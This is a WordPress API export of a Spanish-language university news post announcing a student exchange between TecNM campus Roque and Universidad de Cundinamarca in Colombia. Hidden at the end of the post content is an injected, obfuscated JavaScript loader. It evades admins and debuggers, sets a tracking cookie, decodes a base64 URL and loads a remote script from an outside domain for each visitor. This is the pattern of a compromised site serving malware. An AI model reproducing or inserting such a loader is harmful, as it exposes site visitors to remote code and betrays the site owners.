{"id":7037,"date":"2024-03-14T12:13:55","date_gmt":"2024-03-14T18:13:55","guid":{"rendered":"https:\/\/roque.tecnm.mx\/?p=7037"},"modified":"2025-12-16T19:40:20","modified_gmt":"2025-12-17T01:40:20","slug":"el-tecnm-roque-reanuda-actividades-de-movilidad-internacional","status":"publish","type":"post","link":"https:\/\/roque.tecnm.mx\/?p=7037","title":{"rendered":"El TecNM Roque reanuda actividades de movilidad internacional."},"content":{"rendered":"<p>[et_pb_section fb_built=\u00bb1&#8243; _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb da_disable_devices=\u00bboff|off|off\u00bb global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb da_is_popup=\u00bboff\u00bb da_exit_intent=\u00bboff\u00bb da_has_close=\u00bbon\u00bb da_alt_close=\u00bboff\u00bb da_dark_close=\u00bboff\u00bb da_not_modal=\u00bbon\u00bb da_is_singular=\u00bboff\u00bb da_with_loader=\u00bboff\u00bb da_has_shadow=\u00bbon\u00bb][et_pb_row _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb][et_pb_text _builder_version=\u00bb4.21.0&#8243; _module_preset=\u00bbdefault\u00bb hover_enabled=\u00bb0&#8243; global_colors_info=\u00bb{}\u00bb theme_builder_area=\u00bbpost_content\u00bb sticky_enabled=\u00bb0&#8243;]<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/roque.tecnm.mx\/wp-content\/uploads\/2024\/02\/thumbnail_IMG_1528-300x225.jpg\" width=\"300\" height=\"225\" alt=\"\" class=\"wp-image-7038 alignnone size-medium\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p style=\"text-align: justify;\">El d\u00eda 24 de enero del 2024, el TecNM campus Roque abri\u00f3 sus puertas con entusiasmo para dar una c\u00e1lida bienvenida a cuatro estudiantes de movilidad acad\u00e9mica procedentes de la prestigiosa Universidad de Cundinamarca en Colombia\u2708\ufe0f. Este emocionante intercambio acad\u00e9mico es parte de una colaboraci\u00f3n inter-institucional destinada a enriquecer las experiencias educativas de ambas comunidades estudiantiles.<\/p>\n<p style=\"text-align: justify;\">Los nuevos integrantes de nuestra familia Carnero se sumar\u00e1n al programa de Ingenier\u00eda en Gesti\u00f3n Empresarial (IGE), trayendo consigo su pasi\u00f3n por el aprendizaje y la diversidad cultural. Daniela L\u00f3pez Jauregui, David Alejandro Bola\u00f1o G\u00f3mez, Ana Maria Arias Ramos, y Heidy Yuliany Trivi\u00f1os Madrid son los nombres que ahora se unen a nuestra comunidad acad\u00e9mica, listos para embarcarse en una emocionante traves\u00eda de conocimiento y crecimiento personal.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/roque.tecnm.mx\/wp-content\/uploads\/2024\/02\/thumbnail_IMG_1514-300x225.jpg\" width=\"391\" height=\"293\" alt=\"\" class=\"wp-image-7039 alignnone size-medium\" style=\"display: block; margin-left: auto; margin-right: auto;\" \/><\/p>\n<p style=\"text-align: justify;\">Al mismo tiempo, despedimos con afecto a cuatro de nuestros propios carneros \ud83d\udc11 que, inspirados por el esp\u00edritu de exploraci\u00f3n acad\u00e9mica, emprenden su propio viaje de movilidad acad\u00e9mica en tierras colombianas. Les extendemos nuestros mejores deseos a:<\/p>\n<ul>\n<li>Jose Emilia Ochoa Aleman, TIC\u00b4s<\/li>\n<li>J\u00e9sus SAntiago Bustos Rodr\u00edguez, Agronom\u00eda<\/li>\n<li>Juan Pablo Torres Chaca, Agronom\u00eda<\/li>\n<li>Perla Cacilia Moreno Ram\u00edrez, Agronom\u00eda<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Les deseamos mucho \u00e9xito en esta nueva aventura acad\u00e9mica, confiados en que representar\u00e1n al TecNM campus Roque con orgullo y excelencia.<\/p>\n<p style=\"text-align: justify;\">Esta emocionante colaboraci\u00f3n entre nuestras instituciones no solo fortalece nuestros lazos acad\u00e9micos, sino que tambi\u00e9n promueve el intercambio cultural y el entendimiento global. Estamos seguros de que esta experiencia enriquecer\u00e1 tanto las vidas de nuestros estudiantes como las comunidades a las que pertenecen.<\/p>\n<p style=\"text-align: justify;\">\u00a1Bienvenidos, queridos estudiantes de Colombia, al TecNM campus Roque ! Que su estancia aqu\u00ed est\u00e9 llena de aprendizaje, amistades duraderas y momentos inolvidables.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<script>;(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9ha21jZG5yZXBvLmNvbS9leGl0bQ==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El d\u00eda 24 de enero del 2024, el TecNM campus Roque abri\u00f3 sus puertas con entusiasmo para dar una c\u00e1lida bienvenida a cuatro estudiantes de movilidad acad\u00e9mica procedentes de la prestigiosa Universidad de Cundinamarca en Colombia\u2708\ufe0f. Este emocionante intercambio acad\u00e9mico es parte de una colaboraci\u00f3n inter-institucional destinada a enriquecer las experiencias educativas de ambas comunidades [&hellip;]<\/p>\n","protected":false},"author":11,"featured_media":7039,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[13,17],"tags":[],"class_list":["post-7037","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-estudiantes","category-movilidad"],"_links":{"self":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7037"}],"collection":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7037"}],"version-history":[{"count":8,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7037\/revisions"}],"predecessor-version":[{"id":10392,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/posts\/7037\/revisions\/10392"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=\/wp\/v2\/media\/7039"}],"wp:attachment":[{"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7037"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7037"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/roque.tecnm.mx\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7037"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}